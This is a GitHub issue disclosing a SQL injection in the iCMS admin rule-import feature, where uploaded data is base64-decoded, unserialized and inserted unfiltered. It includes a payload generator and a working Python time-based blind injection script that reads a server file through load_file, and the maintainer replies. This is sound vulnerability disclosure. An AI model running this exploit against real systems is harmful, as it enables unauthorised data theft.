New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

I found a SQL injection vulnerability #42

Closed
P0desta opened this Issue Oct 23, 2018 · 1 comment

Comments

Projects
None yet
2 participants
@P0desta

P0desta commented Oct 23, 2018

Vulnerabilities are generated in the background

See line 464 of the code spider.admincp.php

	public function do_import_rule() {
        files::$check_data        = false;
        files::$cloud_enable      = false;
        iFS::$config['allow_ext'] = 'txt';
		$F = iFS::upload('upfile');
		$path = $F['RootPath'];
		if ($path) {
			$data = file_get_contents($path);
			if ($data) {
				$data = base64_decode($data);
				$data = unserialize($data);
				iDB::insert("spider_rule", $data);
			}
			@unlink($path);
			iUI::success('规则导入完成', 'js:1');
		}
	}

You can see that the rule that will be uploaded here is first decoded by base64, then deserialized and then substituted into IDB::insert

Take a look at insert

public static function insert($table, $data,$IGNORE=false) {
        $fields = array_keys($data);
        self::query("INSERT ".($IGNORE?'IGNORE':'')." INTO ".iPHP_DB_PREFIX_TAG."{$table} (`" . implode('`,`',$fields) . "`) VALUES ('".implode("','",$data)."')");
        return self::$insert_id;
    }

No filtering, construct payload

<?php
    $data = array("rule"=>"p0desta'or if(1,sleep(5),1))#");
    echo(base64_encode(serialize($data)));

If you have permission, we can use the injection to achieve file reading, and write the poc as follows

import requests
import time
import base64
burp0_url = "http://www.test.com:80/icms/admincp.php?app=spider&do=import_rule&frame=iPHP&CSRF_TOKEN=e10bf76a04f509d4fecbe3d9a9019015e21f12bd"
burp0_cookies = {"iCMS_apps_tab": "apps-type-1", "PHPSESSID": "hklte5he8o90kmmcmep2986jf7", "iCMS_iCMS_AUTH": "a2bab484wFGE7nGTjwffi_SYNVY9ZFggA3JUMGaO1_Ht2uptiqTvhEdCY7b5NHj1gElIXJsgys_WSXLIR7TBZbQInHANWku0zmbXD2GV2NDqB2eIjrKkgK_L2g", "iCMS_article_category_tabs": "tree", "iCMS_USER_AUTH": "dc043aa07gOqcLfWTuJoLSCrKIkbJNa8SPGk1VUKhacikJl4JxbrK2aBNBbk0bbmKnQwweqtz7vvJ93P2lLGBzezHER9aEK_HMs0_39QpgM5hSdhCCNxDv8Lwtx1RRqZEVpWUZBwAjJe9476soMuCC6-gJ1e_mfMMhYSA8ioWG1OUFUvUW07tVg5F0RUP2oamPz91F-t85bDNOEnubfHpxzFMND3EABDYJN0o1HfVweojEDYaxs-l6VEiuc0fFUlm-MIZXnd5xe1h6std5cCRwRCS_H71q-oTNO3NbuyojT9HVlCafwxmz7BTlmfIRHeADx7DImb_UyY_daATbgMffPsEHs4KApMstm9pbT4D53E8YbyCAnCDog4MQ7tV3snwpSRufPJCdeY3fkJUFyDhfbqTiJXEAxAcOWCoxGwLXWPI-Ns9Tyjh4WJChqpy0_gwa3JSszGZOQZaAf86KqeDKdct-YSE2UN6qwRVvUeOijMZrdzPxaqt_1OzlhDeBPlM4UW4xQMh7VQ3q5TcfpIHclZWiAspuU8Ynnj3XEwAo8", "iCMS_userid": "b8423c8bm9SnzUz782Y6XmtRdU1dTR3CL9iqL-Iv83vI7htnIg", "iCMS_nickname": "c3bc646dcSTyka3txmYpDcMW2sUPNhaunl7kIzv0Nf_89GTeIZNk", "iCMS_captcha": "0d9585a2vvMO_fVbJRXMR3w48z84hOnLN7JFLRTPC-BzbX7T"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------21119269733568", "Referer": "http://www.test.com/fiyocms/", "Connection": "keep-alive", "Upgrade-Insecure-Requests": "1"}

result = ''
for i in range(1,5):
    for j in range(97,123):
        p = "p0desta'or if((select ascii(substr((select load_file('E://p0desta.txt')),{0},1))={1}),sleep(5),1))#".format(i,j)
        payload = 'a:1:{s:4:"rule";s:'+str(len(p))+':"'+p+'";}'
        burp0_data="-----------------------------21119269733568\r\nContent-Disposition: form-data; name=\"upfile\"; filename=\"1.txt\"\r\nContent-Type: text/plain\r\n\r\n{0}\r\n-----------------------------21119269733568--\r\n".format(base64.b64encode(payload))
        start_time = time.time()
        content = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
        end_time = time.time()
        if end_time - start_time >= 5:
            result += chr(j)
            print result
            break
print result


@idreamsoft

This comment has been minimized.

Owner

idreamsoft commented Oct 23, 2018

Thank you, we will fix it as soon as possible

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment